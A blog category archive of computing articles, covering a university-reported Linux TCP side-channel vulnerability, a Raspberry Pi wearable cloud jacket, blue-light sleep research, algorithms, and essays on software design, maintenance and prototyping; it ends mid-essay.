Category Archives: Computer

Know the secret of security threat to many Internet

images (1)Such a weakness could be used to launch targeted attacks that track users online activity.

Forcibly terminate a communication, hijack a conversation between hosts or degrade the privacy guarantee by anonymity networks such as Tor.

Led by Yue Cao, a computer science graduate student in UCR’s Bourns College of Engineering, the research will be presented on Wednesday (Aug. 10) at the USENIX Security Symposium in Austin, Texas. The project advisor is Zhiyun Qian, an assistant professor of computer science at UCR, whose research focuses on identifying security vulnerabilities to help software companies improve their systems.

While most users don’t interact directly with the Linux operating system, the software runs behind-the -scenes on internet servers, android phones and a range of other devices. To transfer information from one source to another, Linux and other operating systems use the Transmission Control Protocol (TCP) to package and send data, and the Internet Protocol (IP) to ensure the information gets to the correct destination.

For example, when two people communicate by email, TCP assembles their message into a series of data packets — identified by unique sequence numbers — that are transmitted, received, and reassembled into the original message. Those TCP sequence numbers are useful to attackers, but with almost 4 billion possible sequences, it’s essentially impossible to identify the sequence number associated with any particular communication by chance.

The UCR researchers didn’t rely on chance though. Instead, they identified a subtle flaw (in the form of ‘side channels’) in the Linux software that enables attackers to infer the TCP sequence numbers associated with a particular connection with no more information than the IP address of the communicating parties.

This means that given any two arbitrary machines on the internet, a remote blind attacker without being able to eavesdrop on the communication, can track users’ online activity, terminate connections with others and inject false material into their communications. Encrypted connections (e.g., HTTPS) are immune to data injection, but they are still subject to being forcefully terminated by the attacker. The weakness would allow attackers to degrade the privacy of anonymity networks, such as Tor, by forcing the connections to route through certain relays. The attack is fast and reliable, often taking less than a minute and showing a success rate of about 90 percent.

Qian said unlike conventional cyber attacks, users could become victims without doing anything wrong, such as downloading malware or clicking on a link in a phishing email.

“The unique aspect of the attack we demonstrated is the very low requirement to be able to carry it out. Essentially, it can be done easily by anyone in the world where an attack machine is in a network that allows IP spoofing. The only piece of information that is needed is the pair of IP addresses (for victim client and server), which is fairly easy to obtain,” Qian said.

How powerful form of mobile computing

A fully functioning, yet compact and lightweight cloud computing system.

Using 10 low-cost, credit-card-sized computers called Raspberry Pi’s, an old winter jacket, three power banks and a small remote touch screen display, Hasan and Khan developed a wearable system that brings all mobile computing solutions together, creating the ultimate smart device. The cloud jacket could make the design of mobile and wearable devices simple, inexpensive and lightweight by allowing users to tap into the resources of the wearable cloud, instead of relying solely on the capabilities of their mobile hardware.

“Currently if you want to have a smart watch, smartphone, an exercise tracker and smart glasses, you have to buy individual expensive devices that aren’t working together,” Hasan said. “Why not have a computational platform with you that can support many forms of mobile and wearable devices? Then all of these capabilities can become really inexpensive.”

The need for more powerful processors and consumer expectations for high-performance applications have caused the design of wearable and mobile devices to be complex and expensive. Someone who wishes to own a smart watch, smart glasses, a smartphone and a wearable health device would have to spend between $2,000 and $3,000 to purchase such devices. The cloud jacket prototype has roughly 10 gigabytes of RAM, while the average smartphone has only one to three gigabytes. In regard to storage, each Raspberry Pi within the jacket has 32 gigabytes of memory available.

Most wearable and mobile devices are made with processors that are nearly 10 times slower than desktop or laptop processors, limiting the types of applications that can be run on them. With mobile apps’ becoming more complex, newer, more powerful versions of mobile and wearable devices are continuously released in order to keep up with changes in technology, resulting in increased prices.

To make up for resource limitations, many mobile applications are also powered by cloud servers, which require constant communication over the internet. Mobile and wearable device users are required to upload all personal data to remote public clouds or local cloud data centers, without the knowledge of where their personal data is actually being stored.

“Our overall approach is to create a generic atmosphere or platform that users can customize to fit their needs,” Khan said. “The wearable cloud can act as an application platform, so instead of modifying or having to upgrade hardware, this wearable model provides a platform, and developers can build anything on top of it.”

With a wearable cloud, mobile and wearable devices would no longer need complex, powerful processors. By turning them into “dumb terminal devices” or controllers, the wearable cloud would provide the experience of a smart device. By connecting the terminal devices via Bluetooth or Wi-Fi, a user utilizes the devices to request services via a user intuitive display and interactions. The computational task is sent to the wearable private cloud.

Nodes inside the jacket are engaged and compute the task collectively. Upon completion, the displayable result is sent back to the terminal device. The tasks are performed from the privately owned wearable cloud jacket, which also retains most, if not all, personal data.

“Once you have turned everything else into a ‘dumb device,’ the wearable cloud becomes the smart one,” Hasan said. “The application paradigm becomes much more simple and brings everything together. Instead of individual solutions, now you have everything as a composite solution.”

Hasan and Khan’s wearable cloud concept differs from existing “smart clothing” solutions in that they only act as input devices. Current products such as the Levi’s “Smart Jacket” allow a user to make hand gestures on the jacket to answer a phone call or shuffle through a playlist.

The wearable personal cloud concept is not limited to clothing. The system model allows the personal cloud to extend to any item carried on a daily basis, from a jacket to a briefcase, purse or backpack. Hasan and Khan believe this type of technology solution could aid in a variety of ways, from the way first responders communicate and share information during disasters to the way soldiers communicate on the battlefield.

“With seven to 10 people wearing such a cloud together, they create what we call a hyper-cloud, a much more powerful engine,” Hasan said. “The jacket can also act as a micro or picocell tower. All of its capabilities can be shared on a private network with other devices via Wi-Fi or Bluetooth. If a first responder is out in the field and doesn’t have complete information to act on a mission, but someone else does, it can be shared and updated through the cloud in real time.”

Suppose a disaster occurs and first responders are entering a damaged building. They may have blueprints of what the building looked like prior to the incident, but only those inside know what areas are now damaged or where an injured person is located. By pairing the wearable cloud with a device like Google Glass or night vision goggles, anyone with access to the cloud can see whatever the person wearing the cloud is seeing in real time, without the need for platform- or device-specific hardware and software.

Hasan and Khan call this a delegated experience.

“Another potential application area that we are looking into is hospital gowns,” Hasan said. “When a patient comes in, they are connected to monitors to obtain heart rate, blood pressure and other vitals. Whenever a patient has to go to the restroom or needs to be moved around, they have to take everything off or maneuver around with a large pole carrying all of the connected devices. Instead, we are putting sensors inside a vest that can be placed over the hospital gown itself. There will be a small version of the wearable cloud within the vest so that the vest itself can collect information, like a patient’s temperature.”

Know the effect of blue light screens

The use of smartphones and tablet computers during evening hours has previously been associated with sleep disturbances in humans.

The use of blue light emitting devices during evening hours has been shown to interfere with sleep in humans. In a new study from Uppsala University involving 14 young females and males, neuroscientists Christian Benedict and Frida Rångtell sought to investigate the effects of evening reading on a tablet computer on sleep following daytime bright light exposure.

‘Our main finding was that following daytime bright light exposure, evening use of a self-luminous tablet for two hours did not affect sleep in young healthy students’, says Frida Rångtell, first author and PhD student at the Department of Neuroscience at Uppsala University.

‘Our results could suggest that light exposure during the day, e.g. by means of outdoor activities or light interventions in offices, may help combat sleep disturbances associated with evening blue light stimulation. Even if not examined in our study, it must however be kept in mind that utilizing electronic devices for the sake of checking your work e-mails or social network accounts before snoozing may lead to sleep disturbances as a result of emotional arousal’, says senior author Christian Benedict, associate professor at the Department of Neuroscience.

learn more about the computer algorithms

The use of algorithms to filter and present information online is increasingly shaping our everyday experience of the real world.

Associate Professor Michele Willson of Curtin University, Perth, Australia looked at particular examples of computer algorithms and the questions they raise about personal agency, changing world views and our complex relationship with technologies.

Algorithms are central to how information and communication are located, retrieved and presented online, for example in Twitter follow recommendations, Facebook newsfeeds and suggested Google map directions. However, they are not objective instructions but assume certain parameters and values, and are in constant flux, with changes made by both humans and machines.

Embedded in complex amalgams of political, technical, cultural and social interactions, algorithms bring about particular ways of seeing the world, reproduce stereotypes, strengthen world views, restrict choices or open previously unidentified possibilities.

As well as shaping what we see online, algorithms are increasingly telling us what we should be seeing, the study argues. For example, an algorithm that claims to spot beauty and tell you which selfies to delete implies we should trust technology more than ourselves to make aesthetic choices. Such algorithms also carry assumptions that beauty can be defined as universal and timeless, and can be easily reduced to a particular combination of data.

The idea that everything is reducible to data is also beginning to affect the way people perceive their environment and everyday relations. This can be seen in the growing popularity of wearable devices that track aspects of our physical activity and health then analyse and relay them back to us. Such algorithm-driven technologies transform biological items and actions into data — a process that is unquestioned, normalised and invisible.

Professor Willson said: “By delegating everyday practices to technological processes, with the resultant need to break down and reduce complex actions into a series of steps and data decision points, algorithms epitomise and encapsulate a growing tendency towards atomisation and fragmentation that resonates more broadly with an increasing emphasis on singularity, quantification and classification in the everyday.”

Reviews Of Software Design and Programmers

How important are software design skills to a programmer? Programmers, in the traditional, and perhaps most widespread, view of the software development process, or others .

The job of the programmer, after all, is to write code. Code is viewed as a “construction” activity, and everyone knows you have to complete the design before beginning construction. The real design work is performed by specialized software designers. Designers create the designs and hand them off to programmers, who turn them into code according to the designer’s specifications. In this view, then, the programmer only needs enough design skills to understand the designs given to him. The programmer’s main job is to master the tools of her trade.

This view, of course, only tells one story, since there is great variety among software development projects. Let’s consider a spectrum of software development “realities.” At one end of the spectrum we have the situation described above. This hand-off based scenario occurs especially on larger, more complex projects, and especially within organizations that have a longstanding traditional software engineering culture. Specialization of function is a key component on these kinds of projects. Analysts specialize in gathering and analyzing requirements, which are handed off to designers who specialize in producing design specifications, which are handed off to programmers who specialize in producing code.

At the opposite end of the spectrum, best represented by the example of Extreme Programming (XP), there are no designers, just programmers, the programmers are responsible for the design of the system. In this situation, there is no room for specialization. According to Pete McBreen, in his excellent analysis of the Extreme Programming methodology and phenomenon, Questioning Extreme Programming, “The choice that XP makes is to keep as many as possible of the design-related activities concentrated in one role—the programmer.” [McBreen, 2003, p. 97] This reality is also well represented in a less formal sense by the millions of one or two person software development shops in which the same people do just about everything—requirements, design, construction, testing, deployment, documentation, training, and support.

Many other realities fall somewhere in between the two poles a) of pure, traditional, segmented software engineering, where highly detailed “complete designs” are handed off to programmers, and b) Extreme Programming and micro-size development teams, where programmers are the stars of the show. In the “middle realities” between these poles there are designers, lead programmers, or “architects” who create a design (in isolation or in collaboration with some or all of the programmers), but the design itself is (intentionally or unintentionally) not a complete design. Furthermore, the documentation of the design will have wide disparities in formality and format from one reality to another. In these situations, either explicitly or implicitly, the programmers have responsibility over some portion of the design, but not all of it. The programmer’s job is to fill in the blanks in the design as she writes the code.

There is one thing that all of the points along this spectrum have in common: even in the “programmers just write the code” software engineering view, all programmers are also software designers. That bears repeating: all programmers are also software designers. Unfortunately, this fact is not often enough recognized or acknowledged, which leads to misconceptions about the nature of software development, the role of the programmer, and the skills that programmers need to have. (Programmers, when was the last time you were tested on, or even asked about, your design skills in a job interview?)

In an article for IEEE Software magazine called “Software Engineering Is Not Enough,” James A. Whittaker and Steve Atkin do an excellent job of skewering the idea that code construction is a rote activity. The picture they paint is a vivid one, so I will quote more than a little from the article:

Imagine that you know nothing about software development. So, to learn about it, you pick up a book with “Software Engineering,” or something similar, in the title. Certainly, you might expect that software engineering texts would be about engineering software. Can you imagine drawing the conclusion that writing code is simple—that code is just a translation of a design into a language that the computer can understand? Well, this conclusion might not seem so far-fetched when it has support from an authority:

The only design decisions made at the coding level address the small implementation details that enable the procedural design to be coded. [Pressman, 1997, p. 346]

Really? How many times does the design of a nontrivial system translate into a programming language without some trouble? The reason we call them designs in the first place is that they are not programs. The nature of designs is that they abstract many details that must eventually be coded. [Whittaker, 2002, p.108]

The scary part is that the software engineering texts that Whittaker and Atkin so skillfully deride are the standard texts used in college software development courses. Whittaker and Atkin continue with this criticism two pages later:

Finally, you decide that you simply read the wrong section of the software engineering book, so you try to find the sections that cover coding. A glance at the table of contents, however, shows few other places to look. For example, Software Engineering: A Practitioners Approach, McGraw-Hill’s best-selling software engineering text, does not have a single program listing. Neither does it have a design that is translated into a program. Instead, the book is replete with project management, cost estimation, and design concepts. Software Engineering: Theory and Practice, Prentice Hall’s bestseller, does dedicate 22 pages to coding. However, this is only slightly more than four percent of the book’s 543 pages. [Whittaker, 2002, p. 110]

(I recommend seeking out this article as the passages I have quoted are only a launching point for a terrific discussion of specific issues to consider before, during, and after code construction.)

Given a world where “coding is trivial” seems to be the prevailing viewpoint, it is no wonder that many working software professionals sought a new way of thinking about the relationship between and nature of design and construction. One approach that has arisen as an alternative to the software engineering approach is the craft-based approach, which de-emphasizes complex processes, specialization, and hand-offs.1 Extreme Programming is an example of a craft-centric methodology. There are many others as well.

Extreme Programming, and related techniques such as refactoring and “test first design,” arose from the work Smalltalk developers Kent Beck and Ward Cunningham did together. The ideas Beck and Cunningham were working with were part of a burgeoning object oriented movement, in which the Smalltalk language and community played a critical role. According to Pete McBreen in Questioning Extreme Programming, “The idea that the source code is the design was widespread in the Smalltalk community of the 1980s.” [McBreen, 2003, p. 100]

Extreme Programming has at its core the idea that the code is the design and that the best way to simultaneously achieve the best design and the highest quality code is to keep the design and coding activities tightly coupled, so much so that the they are performed by the same people—programmers. Refactoring, a key XP concept, codifies a set of methods for incrementally altering, in a controlled manner, the design embodied in code, further leveraging the programmers role as designer. Two other key XP concepts, “test first design” and automated unit testing, are based on the idea that, not only is the code the design, but the design is not complete unless it can be verified through testing. It is, of course, the programmer’s job to verify the design through unit testing.

It is not much of a stretch to conclude that one of the reasons Extreme Programming (and the Agile Methodology movement in general) have become so popular, especially with people who love to write code, is that they recognize (explicitly or implicitly) that programmers have a critical role to play in software design—even when they are not given the responsibility to create or alter the “design.” Academics and practitioners who champion the traditional software engineering point of view often lament that the results of their research and publications do not trickle down fast enough to practicing software developers.

The Solution Of Software Maintenance

The standard rationale for that standard answer is look how much of the budget we’re putting into software maintenance.

If you just only built the software better in the first place, then you wouldn’t have to waste all that money on maintenance.

Well, I want to take the position that this standard answer is wrong. It’s wrong, I want to say, because the standard rationale is wrong.

The fact of the matter is, software maintenance isn’t a problem, it’s a solution!

What we are missing in the traditional view of software as a problem is the special significance of two pieces of information:

  1. The software product is “soft” (easily changed) compared to other, “harder,” disciplines.
  2. Software maintenance is far less devoted to fixing errors (17 percent) than to making improvements (60 percent).

In other words, software maintenance is a solution instead of a problem because in software maintenance we can do something that no one else can do as well, and because when we do it we are usually building new solutions, not just painting over old problems. If software maintenance is seen as a solution and not as a problem, does that give us some new insight into how to do maintenance better?

I take the position that it indeed does.

The traditional, problem-oriented view of maintenance says that our chief goal in maintenance should be to reduce costs. Well, once again, I think that’s the wrong emphasis. If maintenance is a solution instead of a problem, we can quickly see that what we really want to do is more of it, not less of it. And the emphasis, when we do it, should be on maximizing effectiveness, and not on minimizing cost.

New vistas are open to us from this new line of thinking. Once we take our mindset off reducing costs and place it on maximizing effectiveness, what can we do with this new insight?

The best way to maximize effectiveness is to utilize the best possible people. There is a lot of data that supports that conclusion. Much of it is in the “individual differences” literature, where we can see, for example, that some people are significantly better than others at doing software things:

Debugging: some people are 28 times better than others.

Error detection: some people are 7 times better than others.

Productivity: some people are 5 times better than others.

Efficiency: some people are 11 times better than others.

The bottom line of these snapshot views of the individual differences literature is that there is enormous variance between people, and the best way to get the best job done is to get the best people to do it.

This leads us to two follow-on questions:

  1. Does the maintenance problem warrant the use of the best people?
  2. Do we currently use the best people for doing maintenance?

The first question is probably harder to answer than the second. My answer to that first question is “Yes, maintenance is one of the toughest tasks in the software business.” Let me explain why I feel that way.

Several years ago I coauthored a book on software maintenance. In the reviewing process, an anonymous reviewer made this comment about maintenance, which I have remembered to this day:

Maintenance is:

  • intellectually complex (it requires innovation while placing severe constraints on the innovator)
  • technically difficult (the maintainer must be able to work with a concept and a design and its code all at the same time)
  • unfair (the maintainer never gets all the things the maintainer needs. Take good maintenance documentation, for example)
  • no-win (the maintainer only sees people who have problems)
  • dirty work (the maintainer must work at the grubby level of detailed coding)
  • living in the past (the code was probably written by someone else before they got good at it)
  • conservative (the going motto for maintenance is “if it ain’t broke, don’t fix it”)

My bottom line, and the bottom line of this reviewer, is that software maintenance is pretty complex, challenging stuff.

Now, back to the question of who currently does maintenance. In most computing installations, the people who do maintenance tend to be those who are new on the job or not very good at development. There’s a reason for that. Most people would rather do original development than maintenance because maintenance is too constraining to the creative juices for most people to enjoy doing it. And so by default, the least capable and the least in demand are the ones who most often do maintenance.

If you have been following my line of reasoning here, it should be obvious by now that the status quo is all wrong. Maintenance is a significant intellectual challenge as well as a solution and not a problem. If we want to maximize our effectiveness at doing it, then we need to significantly change the way in which we assign people to it.

I have specific suggestions for what needs to be done. They are not pie-in-the-sky theoretical solutions. They are very achievable, if management decides that it wants to do them:

  1. Make maintenance a magnet. Find ways to attract people to the maintenance task. Some companies do this by paying a premium to maintainers. Some do this by making maintenance a required stepping stone to upper management. Some do this by pointing out that the best way to a well-rounded grasp of the institution’s software world is to understand the existing software inventory.
  2. Link maintenance to quality assurance. (We saw this in the previous essay.)
  3. Plan for improved maintenance technology. There are now many tools and techniques for doing software maintenance better. (This has changed dramatically in the last couple of years.) Training and tools selection and procurement should be high on the concerned maintenance manager’s list of tasks.
  4. Emphasize “responsible programming.” The maintainer typically works alone. The best way to maximize the effectiveness of this kind of worker is to make them feel responsible for the quality of what they do. Note that this is the opposite of the now-popular belief in “egoless programming,” where we try to divest the programmer’s personal involvement in the final software product in favor of a team involvement. It is vital that the individual maintainer be invested in the quality of the software product if that product is to continue to be of high quality.

There they are…four simple steps to better software maintenance. But note that each of those steps involves changing a traditional software mindset. The transition is technically easy, but it may not be socially or politically quite so easy. Most people are heavily invested in their traditional way of looking at things.

Human Impact About Software

The first job in the computer software business was as an entry level help desk technician. The computer user for many years since brought home the family’s first Tandy Color Computer.

I joined this tiny software firm on the cusp of the 1.0 release of their first application. If I remember correctly, when I came on board they were in the process of running the floppy disk duplicator day and night, printing out address labels, and packaging up the user documentation. As I pitched in to help get this release out the door, little did I know that I was about to learn a lesson about software development that I will never forget.

The shipments all went out (about a thousand of them I think, all advance orders), and we braced ourselves for the phone to start ringing. In the meantime, I was poring over Peter Norton’s MS-DOS 5.0 book, which was to become my best friend in the coming months. We knew the software had hit the streets when the phone started ringing off the hook. It was insane. The phone would not stop ringing. Long story short, the release was a disaster.

Many people could not even get it installed, and those people who could were probably less happy than the ones who could not. The software was riddled with bugs. Financial calculations were wrong; line items from one order would mysteriously end up on another order; orders would disappear altogether; the reports would not print; indexes were corrupted; the menus were out of whack; cryptic error messages were popping up everywhere; complete crashes were commonplace; tons of people did not have enough memory to even run the application. It was brutal. Welcome, Dan, to the exciting world of software.

Eventually, we just turned off the phones and let everyone go to voice mail. The mailbox would fill up completely about once an hour, and we would just keep emptying it. We could not answer the phones fast enough, and when we did, people were just screaming and ranting. One guy was so mad that several nights in a row he faxed us page after page after page of solid blackness, killing all the paper and ink in our fax machine.

It took us months to dig us out of this hole. We put out several maintenance releases, all free of charge to our customers. We worked through the night many times, and I slept on the floor of the office more than once. Really the only thing that saved us was our own tenacity and the fact that our customers did not have any other place to go. Our software was somewhat unique.

It was obvious to everyone in our company what caused this disaster: bad code. The company had hired a contract developer to write the software from scratch, and, with some help from a couple of his colleagues, this guy wrote some of the worst code I have ever seen. (Thom, if by some slim chance you’re reading this, I’m sorry man, but it was bad). It was total spaghetti. As I learned over the years about cohesion, coupling, commenting, naming, layout, clarity, and the rest, it was always immediately apparent to me why these practices would be beneficial. Wading through that code had prepared me to receive this knowledge openly.

I stayed with the company for three years, and we eventually turned the product into something I am still proud of. It was never easy, though. I swear I packed ten years of experience into those three years. My time working with that software, that company, and the people there who mentored me have shaped all of my software development philosophies, standards, and practices ever since.

When I got some distance from the situation, I was able to articulate to myself and others the biggest lesson I learned there: software can have a huge impact on the lives of real people. Software is not just an abstraction that exists in isolation. When I write code, it’s not just about me, the code, the operating system, and the database. The impact of what I do when I develop software reaches far beyond those things and into people’s lives. Based on my decisions, standards, and commitment to quality (or lack of it), I can have a positive impact or a negative one. Here is a list of all of the people who were effected negatively by that one man’s bad code:

  • Hundreds of customers, whose businesses were depending on our software to work, and who went through hell because of it.
  • The families of those customers, who were deprived of fathers and mothers that had to stay up all night re-entering corrupted data and simply trying to get our software to work at all. (I know, because I was on the phone with them at three in the morning.)
  • The employees of these customers who had to go through the same horrible mess.
  • The owner of our company (who was not involved in the day-to-day operations), whose reputation and standing was seriously damaged by this disaster, and whose bank account was steadily depleted in the aftermath.
  • The prominent business leaders in the vertical market who had blindly endorsed and recommended our software—their reputations were likewise damaged.
  • All of the employees of our company, for obvious reasons.
  • All of our families, significant others, etc.—again for obvious reasons.
  • All of the future employees of the company, who always had to explain and deal with the legacy of that bad code and that disastrous first release.
  • The programmer himself, who had to suffer our wrath, and who had to stay up all night for many, many nights trying to fix up his code.
  • The family of that programmer (he had several children) who hardly saw him for several weeks.
  • The other developers (including myself) who had to maintain and build on that code in the years to follow.

Learn More About The Computer Programming

What exactly is software development, and why is it so hard? This is a question that continues to engage our thoughts. Is software development an engineering discipline? Is it art? Is it more like a craft?

We think that it is all of these things, and none of them. Software is a uniquely human endeavor, because despite all of the technological trimmings, we’re manipulating little more than the thoughts in our heads. That’s pretty ephemeral stuff. Fred Brooks put it rather eloquently some 30 odd years ago[Bro95]:

“The programmer, like the poet, works only slightly removed from pure thought-stuff. He builds his castles in the air, from air, creating by exertion of the imagination. Few media of creation are so flexible, so easy to polish and rework, so readily capable of realizing grand conceptual structures. (As we shall see later, this very tractability has its own problems.)”

In a way, we programmers are quite lucky. We get the opportunity to create entire worlds out of nothing but thin air. Our very own worlds, complete with our own laws of physics. We may get those laws wrong of course, but it’s still fun.

This wonderful ability comes at a price, however. We continually face the most frightening sight known to a creative person: the blank page.

1. Writer’s Block

Writers face the blank page, painters face the empty canvas, and programmers face the empty editor buffer. Perhaps it’s not literally empty—an IDE may want us to specify a few things first. Here we haven’t even started the project yet, and already we’re forced to answer many questions: what will this thing be named, what directory will it be in, what type of module is it, how should it be compiled, and so on.

The completely empty editor buffer is even worse. Here we have an infinite number of choices of text with which to fill it.

So it seems we share some of the same problems with artists and writers:

  1. How to start
  2. When to stop
  3. Satisfying the person who commissioned the work

Writers have a name for difficulties in starting a piece: they call itWriter’s Block.

Sometimes writer’s block is borne of fear: Fear of going in the wrong direction, of getting too far down the wrong path. Sometimes it’s just a little voice in your head saying “don’t start yet”. Perhaps your subconscious is trying to tell you that you’re missing something important that you need before you can start.

How do other creative artists break this sort of logjam? Painters sketch; writers write a stream of consciousness. (Writers may also do lots of drugs and get drunk, but we’re not necessarily advocating that particular approach.)

What then, is the programming equivalent of sketching?

Software Sketches

Sometimes you need to practice ideas, just to see if something works. You’ll sketch it out roughly. If you’re not happy with it, you’ll do it again. And again. After all, it takes almost no time to do, and you can crumple it up and throw it away at the end.

For instance, there’s a pencil sketch by Leonardo da Vinci that he used astudy for the Trivulzio equestrian monument. The single fragment of paper contains several quick sketches of different views of the monument: a profile of the horse and rider by themselves, several views of the base with the figures, and so on. Even though the finished piece was to be cast in bronze, da Vinci’s sketches were simply done in pencil, on a nearly-scrap piece of paper. These scribblings were so unimportant that they didn’t even deserve a separate piece of paper! But they served their purpose nonetheless.[1]

Pencil sketches make fine prototypes for a sculpture or an oil painting. Post-It notes are fine prototypes for GUI layouts. Scripting languages can be used to try out algorithms before they’re recoded in something more demanding and lower level. This is what we’ve traditionally called prototyping: a quick, disposable exercise that concentrates on a particular aspect of the project.

In software development, we can prototype to get the details in a number of different areas:

  1. a new algorithm, or combination of algorithms
  2. a portion of an object model
  3. interactions and data flow between components
  4. any high-risk detail that needs exploration

A slightly different approach to sketching can be seen in da Vinci’s Study for the Composition of the Last Supper. In this sketch, you can see the beginnings of the placement of figures for that famous painting. The attention is not placed on any detail—the figures are crude and unfinished. Instead, da Vinci paid attention to focus, balance and flow. How do you arrange the figures, position the hands and arms in order to get the balance and flow of the entire piece to work out?

Sometimes you need to prototype various components of the whole to make sure that they work well together. Again, concentrate of the important aspects and discard unimportant details. Make it easy for yourself. Concentrate on learning, not doing.

As we say in The Pragmatic Programmer, you must firmly have in your head what you are doing before you do it. It’s not at all important to get it right the first time. It’s vitally important to get it right the last time.

Paint Over It

Sometimes the artist will sketch out a more finished looking piece, such as Rembrandt’s sketch for Abraham’s Sacrifice Of Isaac in 1635. It’s a crude sketch that has all of the important elements of the final painting, all in roughly the right areas. It proved the composition, the balance of light and shadow, and so on. The sketch is accurate, but not precise. There are no fine details.

Media willing, you can start with such a sketch, where changes are quick and easy to make, and then paint right over top of it with the more permanent, less-forgiving media to form the final product.

To simulate that “paint over a sketch” technique in software, we use a Tracer Bullet development. If you haven’t read The Pragmatic Programmer yet, here’s a quick explanation of why we call it a Tracer Bullet.

 

By the time you’ve set up, checked and rechecked the numbers, and issued the orders to the grunts manning the machine, the target has long since moved.

In software, this kind of approach can seen in any method that emphasizes planning and documenting over producing working software. Requirements are generally finalized before design begins. Design and architecture, detailed in exquisite UML diagrams, is firmly established before any code is written (presumably that would make coders analogous to the “grunts” who actually fire the weapon, oblivious to the target).

Don’t misunderstand: if you’re firing a really huge missile at a known, stable target (like a city), this works out just great and is the preferable way to go. If you’re shooting at something more maneuverable than a city, though, you need something that provides a bit more real-time feedback.

Tracer bullets.

With tracer bullets, you simply fill the magazine with phosphorus-tipped bullets spaced every so often. Now you’ve got streaks of light showing you the path to the target right next to the live ammunition.

For our software equivalent, we need a skeletally thin system that does next to nothing, but does it from end to end, encompassing areas such as the database, any middleware, the application logic or business rules, and so on. Because it is so thin, we can easily shift position as we try to track the target. By watching the tracer fire, we don’t have to calculate the effect of the wind, or precisely know the location of the target or the weight of the ammunition. We watch the dynamics of the entire system in motion, and adjust our aim to hit the target under actual conditions.

As with the paintings, the important thing isn’t the details, but the relationships, the responsibilities, the balance, and the flow. With a proven base—however thin it may be—you can proceed in greater confidence towards the final product.

Group Writer’s Block

Up till now, we’ve talked about writer’s block as it applies to you as an individual. What do you do when the entire team has a collective case of writer’s block? Teams that are just starting out can quickly become paralyzed in the initial confusion over roles, design goals, and requirements.

One effective way to get the ball rolling is to start the project off with a group-wide, tactile design session. Gather all of the developers in a room[2] and provide sets of Lego blocks, plenty of Post-It notes, whiteboards and markers. Using these, proceed to talk about the system you’ll be building and how you think you might want to build it.

Keep the atmosphere loose and flexible; this gets the team comfortable with the idea of change. Because this is low inertia design, anyone can contribute. It’s well within any participant’s skills to walk up to the whiteboard and move a PostIt-note, or to grab a few Lego blocks and rearrange them. That’s not necessarily true of a CASE tool or drawing software: those tools do not lend themselves readily to rapid-feedback, group interaction.

Jim Highsmith offers us a most excellent piece of advice: The best way to get a project done faster is to start sooner. Blast through that writer’s block, and just start.

Just Start

Whether you’re using prototypes or tracer bullets, individually or with a group, you’re working—not panicking. You’re getting to know the subject, the medium, and the relationship between the two. You’re warmed up, and have started filling that blank canvas.

But we have one additional problem that the painters do not have. We face not one blank canvas per project, but hundreds. Thousands, maybe. One for every new module, every new class, every new source file. What can we do to tackle that multiplicity of blank of canvases? The Extreme Programming[Bec00] notion of Test First Design can help.

The first test you are supposed to write—before you even write the code—is a painfully simple, nearly trivial one. It seems to do almost nothing. Maybe it only instantiates the new class, or simply calls the one routine you haven’t written yet. It sounds so simple, and so stupid, that you might be tempted not to do it.

The advantage to starting with such a trivial test is that it helps fill in the blank canvas without facing the distraction of trying to write production code. By just writing this very simple test, you have to get a certain level of infrastructure in place and answer the dozen or so typical startup questions: What do I call it? Where do I put it in the development tree? You have to add it to version control, and possibly to the build and/or release procedures. Suddenly, a very simple test doesn’t look so simple any more. So ignore the exquisite logic of the routine you are about to write, and get the one-line test to compile and work first. Once that test passes, you can now proceed to fill in the canvas—it’s not blank anymore. You’re not writing anything from scratch, you’re just adding a few routines. . . .

2. When to Stop

We share another problem with painters: knowing when to stop. You don’t want to stop prematurely; the project won’t yet be finished.[3] But if you don’t stop in time, and keep adding to it unnecessarily, the painting becomes lost in the paint and is ruined.

We had a client once who seemed to have some difficulty in the definition of “done” with regard to code. After toiling for weeks and weeks on a moderately complex piece of software, Matthew (not his real name) proudly announced the Code Was Done. He went on to explain that it didn’t always produce the correct output. Oh, and every now and again, the code would crash for no apparent reason. But it’s done. Unfortunately, wishful thinking alone doesn’t help us get working software out to users.

It’s easy to err on the other side of the fence too—have you ever seen a developer make a career of one little module? Have you ever done that? It can happen for any number of political reasons (“I’m still working on XYZ, so you can’t reassign me yet”), or maybe we just fall in love with some particularly elegant bit of code. But instead of making the code better and better, we actually run a huge risk of ruining it completely. Every line of code not written is correct—or at least, guaranteed not to fail. Every line of code we write, well, there are no guarantees. Each extra line carries some risk of failure, carries an additional cost to maintain, document, and teach a newcomer. When you multiply it out, any bit of code that isn’t absolutely necessary incurs a shockingly large cost. Maybe enough to kill the project.

How then, can we tell when it’s time to stop?

Painting Murals

Knowing when to stop is especially hard when you can’t see the whole thing that you’re working on. Mural painting, for instance, takes a special eye. In corporate software development, you may only ever see the one little piece of detail that you’re working on. If you watch mural painters up close, it’s quite difficult to discern that the splash of paint they’re working on is someone’s hand, or eyeball. If you can’t see the big picture, you won’t be able to see how you fit in.

The opposite problem is even worse—suppose you’re the lone developer on a project of this size. Most muralists are simply painting walls, but anyone who’s ever painted their house can tell you that ceilings are a lot harder than walls, especially when the ceiling in question covers 5,000 square feet and you have to lie on your back 20 meters above the floor to paint it. So what did Michelangelo do when planning to paint theSistine Chapel? The same thing you should do when faced with a big task.

Michelangelo divided his mural into panels: separate, free-standing areas, each of which tells a story. But he did so fairly carefully, such that the panels exhibit these characteristics:

  • High cohesion
  • Low coupling
  • Conceptual integrity

These are things we can learn from.

Cohesion

What is cohesion? As used here, cohesion refers to the panel’s focus and clarity of purpose. In the Sistine Chapel ceiling, each panel tells a single Old Testament story—completely, but without any extraneous elements.

In software, the Unix command line tool’s philosophy of small, sharp tools (“do one thing and do it well”) is one example. Each tool is narrowly focused on it’s primary task. Low cohesion occurs when you have giant “manager” classes that try to do too many disparate things at once.

Coupling

Coupling is related to orthogonality[HT00]: unrelated things should remain, well, unrelated. Following the object-oriented principle of encapsulation helps to prevent unintended coupling, but there are still other ways to fall into the coupling trap. Michelangelo’s panels have low coupling; they are all self-contained; there are no instances of figures reaching from one panel into the next, for instance. Why is that important?

If you look closely at one of the panels that portrays angels gliding about the firmament of heaven, you’ll notice that one of the angels is turning his back to, and gliding away from, the other angels. You’ll also notice that said angel isn’t wearing any pants. He’s rather pointedly “mooning” the other angels.

